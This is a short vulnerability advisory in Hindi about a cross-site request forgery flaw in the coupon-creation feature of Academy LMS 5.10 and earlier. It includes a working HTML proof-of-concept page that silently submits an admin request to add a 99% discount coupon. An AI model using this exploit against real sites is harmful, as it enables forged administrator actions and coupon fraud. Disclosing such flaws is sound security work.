
Academy LMS <= 5.10 CSRF
Academy LMS <= 5.10 CSRF
Academy LMS एक एप्लिकेशन है जहां लोग कोर्स बना सकते हैं और उनका विज्ञापन कर सकते हैं। कूपन जोड़ने की सुविधा CSRF के प्रति संवेदनशील है क्योंकि कोई टोकन नहीं है जो इस हमले को टालने का कारण बनता है।
हमारी प्रमाण अवधारणा का पहला कदम प्रशासनिक उपयोगकर्ता के साथ प्लेटफॉर्म में प्रमाणित करना है।
उसके बाद, बस उस पृष्ठ तक पहुंचें जिसमें भेद्यता का शोषण करने का कोड है, देखें कि एक नया कूपन स्वचालित रूप से बनाया गया था।
शोषण में उपयोग किया गया कोड:
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://target.com/admin/coupons/add" method="POST">
<input type="hidden" name="code" value="vinix" />
<input type="hidden" name="discount_percentage" value="99" />
<input type="hidden" name="expiry_date" value="12/11/2022" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>